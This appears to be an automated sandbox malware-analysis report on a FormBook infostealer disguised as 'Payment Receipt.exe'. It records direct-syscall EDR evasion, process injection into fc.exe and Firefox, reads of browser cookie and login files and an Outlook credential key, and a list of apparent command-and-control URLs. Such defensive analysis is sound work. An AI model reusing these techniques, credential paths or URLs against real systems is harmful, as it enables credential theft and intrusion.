              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01672B57 mov eax, dword ptr fs:[00000030h]0_2_01672B57
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164EB50 mov eax, dword ptr fs:[00000030h]0_2_0164EB50
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01668B28 mov eax, dword ptr fs:[00000030h]0_2_01668B28
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01668B28 mov eax, dword ptr fs:[00000030h]0_2_01668B28
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674B00 mov eax, dword ptr fs:[00000030h]0_2_01674B00
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161EB1D mov eax, dword ptr fs:[00000030h]0_2_0161EB1D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161EB1D mov eax, dword ptr fs:[00000030h]0_2_0161EB1D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161EB1D mov eax, dword ptr fs:[00000030h]0_2_0161EB1D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161EB1D mov eax, dword ptr fs:[00000030h]0_2_0161EB1D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161EB1D mov eax, dword ptr fs:[00000030h]0_2_0161EB1D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161EB1D mov eax, dword ptr fs:[00000030h]0_2_0161EB1D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161EB1D mov eax, dword ptr fs:[00000030h]0_2_0161EB1D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161EB1D mov eax, dword ptr fs:[00000030h]0_2_0161EB1D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161EB1D mov eax, dword ptr fs:[00000030h]0_2_0161EB1D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CEB20 mov eax, dword ptr fs:[00000030h]0_2_015CEB20
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CEB20 mov eax, dword ptr fs:[00000030h]0_2_015CEB20
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162CBF0 mov eax, dword ptr fs:[00000030h]0_2_0162CBF0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C0BCB mov eax, dword ptr fs:[00000030h]0_2_015C0BCB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C0BCB mov eax, dword ptr fs:[00000030h]0_2_015C0BCB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C0BCB mov eax, dword ptr fs:[00000030h]0_2_015C0BCB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A0BCD mov eax, dword ptr fs:[00000030h]0_2_015A0BCD
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A0BCD mov eax, dword ptr fs:[00000030h]0_2_015A0BCD
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A0BCD mov eax, dword ptr fs:[00000030h]0_2_015A0BCD
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CEBFC mov eax, dword ptr fs:[00000030h]0_2_015CEBFC
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A8BF0 mov eax, dword ptr fs:[00000030h]0_2_015A8BF0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A8BF0 mov eax, dword ptr fs:[00000030h]0_2_015A8BF0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A8BF0 mov eax, dword ptr fs:[00000030h]0_2_015A8BF0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164EBD0 mov eax, dword ptr fs:[00000030h]0_2_0164EBD0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01654BB0 mov eax, dword ptr fs:[00000030h]0_2_01654BB0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01654BB0 mov eax, dword ptr fs:[00000030h]0_2_01654BB0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0BBE mov eax, dword ptr fs:[00000030h]0_2_015B0BBE
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0BBE mov eax, dword ptr fs:[00000030h]0_2_015B0BBE
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0A5B mov eax, dword ptr fs:[00000030h]0_2_015B0A5B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0A5B mov eax, dword ptr fs:[00000030h]0_2_015B0A5B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164EA60 mov eax, dword ptr fs:[00000030h]0_2_0164EA60
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6A50 mov eax, dword ptr fs:[00000030h]0_2_015A6A50
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6A50 mov eax, dword ptr fs:[00000030h]0_2_015A6A50
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6A50 mov eax, dword ptr fs:[00000030h]0_2_015A6A50
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6A50 mov eax, dword ptr fs:[00000030h]0_2_015A6A50
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6A50 mov eax, dword ptr fs:[00000030h]0_2_015A6A50
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6A50 mov eax, dword ptr fs:[00000030h]0_2_015A6A50
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6A50 mov eax, dword ptr fs:[00000030h]0_2_015A6A50
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161CA72 mov eax, dword ptr fs:[00000030h]0_2_0161CA72
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161CA72 mov eax, dword ptr fs:[00000030h]0_2_0161CA72
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DCA6F mov eax, dword ptr fs:[00000030h]0_2_015DCA6F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DCA6F mov eax, dword ptr fs:[00000030h]0_2_015DCA6F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DCA6F mov eax, dword ptr fs:[00000030h]0_2_015DCA6F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C4A35 mov eax, dword ptr fs:[00000030h]0_2_015C4A35
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C4A35 mov eax, dword ptr fs:[00000030h]0_2_015C4A35
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CEA2E mov eax, dword ptr fs:[00000030h]0_2_015CEA2E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162CA11 mov eax, dword ptr fs:[00000030h]0_2_0162CA11
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DCA24 mov eax, dword ptr fs:[00000030h]0_2_015DCA24
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A0AD0 mov eax, dword ptr fs:[00000030h]0_2_015A0AD0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D4AD0 mov eax, dword ptr fs:[00000030h]0_2_015D4AD0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D4AD0 mov eax, dword ptr fs:[00000030h]0_2_015D4AD0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015F6ACC mov eax, dword ptr fs:[00000030h]0_2_015F6ACC
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015F6ACC mov eax, dword ptr fs:[00000030h]0_2_015F6ACC
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015F6ACC mov eax, dword ptr fs:[00000030h]0_2_015F6ACC
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DAAEE mov eax, dword ptr fs:[00000030h]0_2_015DAAEE
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DAAEE mov eax, dword ptr fs:[00000030h]0_2_015DAAEE
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D8A90 mov edx, dword ptr fs:[00000030h]0_2_015D8A90
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AEA80 mov eax, dword ptr fs:[00000030h]0_2_015AEA80
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AEA80 mov eax, dword ptr fs:[00000030h]0_2_015AEA80
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AEA80 mov eax, dword ptr fs:[00000030h]0_2_015AEA80
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AEA80 mov eax, dword ptr fs:[00000030h]0_2_015AEA80

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\Payment Receipt.exeSection loaded: NULL target: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Payment Receipt.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 4960Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: MEREhDqMRRNSzT.exe, 00000004.00000002.4097647800.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000000.1941376430.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097794735.0000000001241000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: MEREhDqMRRNSzT.exe, 00000004.00000002.4097647800.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000000.1941376430.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097794735.0000000001241000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: MEREhDqMRRNSzT.exe, 00000004.00000002.4097647800.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000000.1941376430.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097794735.0000000001241000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: MEREhDqMRRNSzT.exe, 00000004.00000002.4097647800.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000000.1941376430.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097794735.0000000001241000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.Payment Receipt.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.Payment Receipt.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		312
              Process Injection              		2
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		312
              Process Injection              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Payment Receipt.exe62%VirustotalBrowse
              Payment Receipt.exe71%ReversingLabsWin32.Trojan.SpywareX
              Payment Receipt.exe100%AviraHEUR/AGEN.1318544
              Payment Receipt.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.lonfor.website/bowc/?w0DDw=KH0hz6&1V=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0=0%Avira URL Cloudsafe
              http://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.moyu19.pro/b9e2/?1V=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/0%Avira URL Cloudsafe
              http://cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i0%Avira URL Cloudsafe
              http://www.moyu19.pro0%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/0%Avira URL Cloudsafe
              http://www.nosolofichas.online/hqr6/0%Avira URL Cloudsafe
              http://www.gayhxi.info/k2i2/?1V=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&w0DDw=KH0hz6100%Avira URL Cloudmalware
              http://www.lonfor.website/bowc/0%Avira URL Cloudsafe
              http://www.nosolofichas.online/hqr6/?1V=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs=&w0DDw=KH0hz60%Avira URL Cloudsafe
